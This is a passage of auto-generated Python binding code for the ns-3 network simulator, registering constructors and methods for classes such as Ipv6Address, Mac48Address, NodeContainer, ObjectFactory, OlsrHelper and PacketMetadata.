[param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_static=True) return def register_Ns3Ipv6Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor] cls.add_constructor([param('char const *', 'address')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor] cls.add_constructor([param('uint8_t *', 'address')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor] cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor] cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function] cls.add_method('CombinePrefix', 'ns3::Ipv6Address', [param('ns3::Ipv6Prefix const &', 'prefix')]) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::Ipv6Address', [param('ns3::Address const &', 'address')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function] cls.add_method('Deserialize', 'ns3::Ipv6Address', [param('uint8_t const *', 'buf')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address 
ns3::Ipv6Address::GetAllHostsMulticast() [member function] cls.add_method('GetAllHostsMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function] cls.add_method('GetAllNodesMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function] cls.add_method('GetAllRoutersMulticast', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function] cls.add_method('GetAny', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function] cls.add_method('GetBytes', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv6Address::GetIpv4MappedAddress() const [member function] cls.add_method('GetIpv4MappedAddress', 'ns3::Ipv4Address', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv6Address', [], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function] cls.add_method('IsAllHostsMulticast', 'bool', [], deprecated=True, is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function] cls.add_method('IsAllNodesMulticast', 'bool', [], is_const=True) ## 
ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function] cls.add_method('IsAllRoutersMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function] cls.add_method('IsAny', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsDocumentation() const [member function] cls.add_method('IsDocumentation', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv6Address const &', 'other')], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsIpv4MappedAddress() const [member function] cls.add_method('IsIpv4MappedAddress', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function] cls.add_method('IsLinkLocal', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocalMulticast() const [member function] cls.add_method('IsLinkLocalMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function] cls.add_method('IsLocalhost', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function] cls.add_method('IsSolicitedMulticast', 'bool', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address 
ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac16Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac16Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac64Address addr, ns3::Ipv6Address prefix) [member function] cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address', [param('ns3::Mac64Address', 'addr'), param('ns3::Ipv6Address', 'prefix')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac16Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac16Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac48Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac64Address mac) [member function] cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address', [param('ns3::Mac64Address', 'mac')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeIpv4MappedAddress(ns3::Ipv4Address addr) [member function] cls.add_method('MakeIpv4MappedAddress', 'ns3::Ipv6Address', [param('ns3::Ipv4Address', 
'addr')], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function] cls.add_method('MakeSolicitedAddress', 'ns3::Ipv6Address', [param('ns3::Ipv6Address', 'addr')], is_static=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function] cls.add_method('Serialize', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member function] cls.add_method('Set', 'void', [param('char const *', 'address')]) ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function] cls.add_method('Set', 'void', [param('uint8_t *', 'address')]) return def register_Ns3Ipv6Prefix_methods(root_module, cls): cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor] cls.add_constructor([param('uint8_t *', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor] cls.add_constructor([param('char const *', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor] cls.add_constructor([param('uint8_t', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor] cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')]) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix 
const * prefix) [constructor] cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')]) ## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function] cls.add_method('GetBytes', 'void', [param('uint8_t *', 'buf')], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function] cls.add_method('GetLoopback', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function] cls.add_method('GetOnes', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function] cls.add_method('GetPrefixLength', 'uint8_t', [], is_const=True) ## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function] cls.add_method('GetZero', 'ns3::Ipv6Prefix', [], is_static=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function] cls.add_method('IsEqual', 'bool', [param('ns3::Ipv6Prefix const &', 'other')], is_const=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsMatch(ns3::Ipv6Address a, ns3::Ipv6Address b) const [member function] cls.add_method('IsMatch', 'bool', [param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')], is_const=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) return def register_Ns3Mac48Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address(ns3::Mac48Address const & arg0) [copy constructor] 
cls.add_constructor([param('ns3::Mac48Address const &', 'arg0')]) ## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address() [constructor] cls.add_constructor([]) ## mac48-address.h (module 'network'): ns3::Mac48Address::Mac48Address(char const * str) [constructor] cls.add_constructor([param('char const *', 'str')]) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::Allocate() [member function] cls.add_method('Allocate', 'ns3::Mac48Address', [], is_static=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::ConvertFrom(ns3::Address const & address) [member function] cls.add_method('ConvertFrom', 'ns3::Mac48Address', [param('ns3::Address const &', 'address')], is_static=True) ## mac48-address.h (module 'network'): void ns3::Mac48Address::CopyFrom(uint8_t const * buffer) [member function] cls.add_method('CopyFrom', 'void', [param('uint8_t const *', 'buffer')]) ## mac48-address.h (module 'network'): void ns3::Mac48Address::CopyTo(uint8_t * buffer) const [member function] cls.add_method('CopyTo', 'void', [param('uint8_t *', 'buffer')], is_const=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetBroadcast() [member function] cls.add_method('GetBroadcast', 'ns3::Mac48Address', [], is_static=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast(ns3::Ipv4Address address) [member function] cls.add_method('GetMulticast', 'ns3::Mac48Address', [param('ns3::Ipv4Address', 'address')], is_static=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast(ns3::Ipv6Address address) [member function] cls.add_method('GetMulticast', 'ns3::Mac48Address', [param('ns3::Ipv6Address', 'address')], is_static=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticast6Prefix() [member function] cls.add_method('GetMulticast6Prefix', 
'ns3::Mac48Address', [], is_static=True) ## mac48-address.h (module 'network'): static ns3::Mac48Address ns3::Mac48Address::GetMulticastPrefix() [member function] cls.add_method('GetMulticastPrefix', 'ns3::Mac48Address', [], is_static=True) ## mac48-address.h (module 'network'): bool ns3::Mac48Address::IsBroadcast() const [member function] cls.add_method('IsBroadcast', 'bool', [], is_const=True) ## mac48-address.h (module 'network'): bool ns3::Mac48Address::IsGroup() const [member function] cls.add_method('IsGroup', 'bool', [], is_const=True) ## mac48-address.h (module 'network'): static bool ns3::Mac48Address::IsMatchingType(ns3::Address const & address) [member function] cls.add_method('IsMatchingType', 'bool', [param('ns3::Address const &', 'address')], is_static=True) return def register_Ns3NodeContainer_methods(root_module, cls): ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & arg0) [copy constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'arg0')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer() [constructor] cls.add_constructor([]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::Ptr<ns3::Node> node) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Node >', 'node')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(std::string nodeName) [constructor] cls.add_constructor([param('std::string', 'nodeName')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), 
param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd')]) ## node-container.h (module 'network'): ns3::NodeContainer::NodeContainer(ns3::NodeContainer const & a, ns3::NodeContainer const & b, ns3::NodeContainer const & c, ns3::NodeContainer const & d, ns3::NodeContainer const & e) [constructor] cls.add_constructor([param('ns3::NodeContainer const &', 'a'), param('ns3::NodeContainer const &', 'b'), param('ns3::NodeContainer const &', 'c'), param('ns3::NodeContainer const &', 'd'), param('ns3::NodeContainer const &', 'e')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::NodeContainer other) [member function] cls.add_method('Add', 'void', [param('ns3::NodeContainer', 'other')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(ns3::Ptr<ns3::Node> node) [member function] cls.add_method('Add', 'void', [param('ns3::Ptr< ns3::Node >', 'node')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Add(std::string nodeName) [member function] cls.add_method('Add', 'void', [param('std::string', 'nodeName')]) ## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::Begin() const [member function] cls.add_method('Begin', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >', [], is_const=True) ## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n) [member function] cls.add_method('Create', 'void', 
[param('uint32_t', 'n')]) ## node-container.h (module 'network'): void ns3::NodeContainer::Create(uint32_t n, uint32_t systemId) [member function] cls.add_method('Create', 'void', [param('uint32_t', 'n'), param('uint32_t', 'systemId')]) ## node-container.h (module 'network'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Node>*,std::vector<ns3::Ptr<ns3::Node>, std::allocator<ns3::Ptr<ns3::Node> > > > ns3::NodeContainer::End() const [member function] cls.add_method('End', '__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Node > const, std::vector< ns3::Ptr< ns3::Node > > >', [], is_const=True) ## node-container.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NodeContainer::Get(uint32_t i) const [member function] cls.add_method('Get', 'ns3::Ptr< ns3::Node >', [param('uint32_t', 'i')], is_const=True) ## node-container.h (module 'network'): static ns3::NodeContainer ns3::NodeContainer::GetGlobal() [member function] cls.add_method('GetGlobal', 'ns3::NodeContainer', [], is_static=True) ## node-container.h (module 'network'): uint32_t ns3::NodeContainer::GetN() const [member function] cls.add_method('GetN', 'uint32_t', [], is_const=True) return def register_Ns3NonCopyable_methods(root_module, cls): ## non-copyable.h (module 'core'): ns3::NonCopyable::NonCopyable() [constructor] cls.add_constructor([], visibility='protected') return def register_Ns3ObjectBase_methods(root_module, cls): ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor] cls.add_constructor([]) ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')]) ## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function] cls.add_method('GetAttribute', 'void', [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')], is_const=True) ## object-base.h (module 'core'): bool 
ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & value) const [member function] cls.add_method('GetAttributeFailSafe', 'bool', [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')], is_const=True) ## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('SetAttribute', 'void', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('SetAttributeFailSafe', 'bool', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceConnect', 'bool', [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceConnectWithoutContext', 'bool', [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceDisconnect', 'bool', [param('std::string', 'name'), param('std::string', 'context'), 
param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function] cls.add_method('TraceDisconnectWithoutContext', 'bool', [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')]) ## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function] cls.add_method('ConstructSelf', 'void', [param('ns3::AttributeConstructionList const &', 'attributes')], visibility='protected') ## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function] cls.add_method('NotifyConstructionCompleted', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3ObjectDeleter_methods(root_module, cls): ## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter() [constructor] cls.add_constructor([]) ## object.h (module 'core'): ns3::ObjectDeleter::ObjectDeleter(ns3::ObjectDeleter const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')]) ## object.h (module 'core'): static void ns3::ObjectDeleter::Delete(ns3::Object * object) [member function] cls.add_method('Delete', 'void', [param('ns3::Object *', 'object')], is_static=True) return def register_Ns3ObjectFactory_methods(root_module, cls): cls.add_output_stream_operator() ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(ns3::ObjectFactory const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')]) ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory() [constructor] cls.add_constructor([]) ## object-factory.h (module 'core'): ns3::ObjectFactory::ObjectFactory(std::string typeId) [constructor] cls.add_constructor([param('std::string', 'typeId')]) ## object-factory.h (module 'core'): ns3::Ptr<ns3::Object> ns3::ObjectFactory::Create() const [member 
function] cls.add_method('Create', 'ns3::Ptr< ns3::Object >', [], is_const=True) ## object-factory.h (module 'core'): ns3::TypeId ns3::ObjectFactory::GetTypeId() const [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True) ## object-factory.h (module 'core'): void ns3::ObjectFactory::Set(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('Set', 'void', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(ns3::TypeId tid) [member function] cls.add_method('SetTypeId', 'void', [param('ns3::TypeId', 'tid')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(char const * tid) [member function] cls.add_method('SetTypeId', 'void', [param('char const *', 'tid')]) ## object-factory.h (module 'core'): void ns3::ObjectFactory::SetTypeId(std::string tid) [member function] cls.add_method('SetTypeId', 'void', [param('std::string', 'tid')]) return def register_Ns3OlsrHelper_methods(root_module, cls): ## olsr-helper.h (module 'olsr'): ns3::OlsrHelper::OlsrHelper() [constructor] cls.add_constructor([]) ## olsr-helper.h (module 'olsr'): ns3::OlsrHelper::OlsrHelper(ns3::OlsrHelper const & arg0) [copy constructor] cls.add_constructor([param('ns3::OlsrHelper const &', 'arg0')]) ## olsr-helper.h (module 'olsr'): ns3::OlsrHelper * ns3::OlsrHelper::Copy() const [member function] cls.add_method('Copy', 'ns3::OlsrHelper *', [], is_const=True, is_virtual=True) ## olsr-helper.h (module 'olsr'): void ns3::OlsrHelper::ExcludeInterface(ns3::Ptr<ns3::Node> node, uint32_t interface) [member function] cls.add_method('ExcludeInterface', 'void', [param('ns3::Ptr< ns3::Node >', 'node'), param('uint32_t', 'interface')]) ## olsr-helper.h (module 'olsr'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::OlsrHelper::Create(ns3::Ptr<ns3::Node> node) const [member function] cls.add_method('Create', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >', 
[param('ns3::Ptr< ns3::Node >', 'node')], is_const=True, is_virtual=True) ## olsr-helper.h (module 'olsr'): void ns3::OlsrHelper::Set(std::string name, ns3::AttributeValue const & value) [member function] cls.add_method('Set', 'void', [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')]) ## olsr-helper.h (module 'olsr'): int64_t ns3::OlsrHelper::AssignStreams(ns3::NodeContainer c, int64_t stream) [member function] cls.add_method('AssignStreams', 'int64_t', [param('ns3::NodeContainer', 'c'), param('int64_t', 'stream')]) return def register_Ns3PacketMetadata_methods(root_module, cls): ## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(uint64_t uid, uint32_t size) [constructor] cls.add_constructor([param('uint64_t', 'uid'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::PacketMetadata(ns3::PacketMetadata const & o) [copy constructor] cls.add_constructor([param('ns3::PacketMetadata const &', 'o')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddAtEnd(ns3::PacketMetadata const & o) [member function] cls.add_method('AddAtEnd', 'void', [param('ns3::PacketMetadata const &', 'o')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddHeader(ns3::Header const & header, uint32_t size) [member function] cls.add_method('AddHeader', 'void', [param('ns3::Header const &', 'header'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddPaddingAtEnd(uint32_t end) [member function] cls.add_method('AddPaddingAtEnd', 'void', [param('uint32_t', 'end')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::AddTrailer(ns3::Trailer const & trailer, uint32_t size) [member function] cls.add_method('AddTrailer', 'void', [param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator 
ns3::PacketMetadata::BeginItem(ns3::Buffer buffer) const [member function] cls.add_method('BeginItem', 'ns3::PacketMetadata::ItemIterator', [param('ns3::Buffer', 'buffer')], is_const=True) ## packet-metadata.h (module 'network'): ns3::PacketMetadata ns3::PacketMetadata::CreateFragment(uint32_t start, uint32_t end) const [member function] cls.add_method('CreateFragment', 'ns3::PacketMetadata', [param('uint32_t', 'start'), param('uint32_t', 'end')], is_const=True) ## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Deserialize(uint8_t const * buffer, uint32_t size) [member function] cls.add_method('Deserialize', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::Enable() [member function] cls.add_method('Enable', 'void', [], is_static=True) ## packet-metadata.h (module 'network'): static void ns3::PacketMetadata::EnableChecking() [member function] cls.add_method('EnableChecking', 'void', [], is_static=True) ## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## packet-metadata.h (module 'network'): uint64_t ns3::PacketMetadata::GetUid() const [member function] cls.add_method('GetUid', 'uint64_t', [], is_const=True) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtEnd(uint32_t end) [member function] cls.add_method('RemoveAtEnd', 'void', [param('uint32_t', 'end')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveAtStart(uint32_t start) [member function] cls.add_method('RemoveAtStart', 'void', [param('uint32_t', 'start')]) ## packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveHeader(ns3::Header const & header, uint32_t size) [member function] cls.add_method('RemoveHeader', 'void', [param('ns3::Header const &', 'header'), param('uint32_t', 'size')]) ## 
packet-metadata.h (module 'network'): void ns3::PacketMetadata::RemoveTrailer(ns3::Trailer const & trailer, uint32_t size) [member function] cls.add_method('RemoveTrailer', 'void', [param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')]) ## packet-metadata.h (module 'network'): uint32_t ns3::PacketMetadata::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function] cls.add_method('Serialize', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')], is_const=True) return def register_Ns3PacketMetadataItem_methods(root_module, cls): ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item() [constructor] cls.add_constructor([]) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::Item(ns3::PacketMetadata::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::PacketMetadata::Item const &', 'arg0')]) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::current [variable] cls.add_instance_attribute('current', 'ns3::Buffer::Iterator', is_const=False) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentSize [variable] cls.add_instance_attribute('currentSize', 'uint32_t', is_const=False) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromEnd [variable] cls.add_instance_attribute('currentTrimedFromEnd', 'uint32_t', is_const=False) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::currentTrimedFromStart [variable] cls.add_instance_attribute('currentTrimedFromStart', 'uint32_t', is_const=False) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::isFragment [variable] cls.add_instance_attribute('isFragment', 'bool', is_const=False) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item::tid [variable] cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False) return def register_Ns3PacketMetadataItemIterator_methods(root_module, cls): ## packet-metadata.h (module 
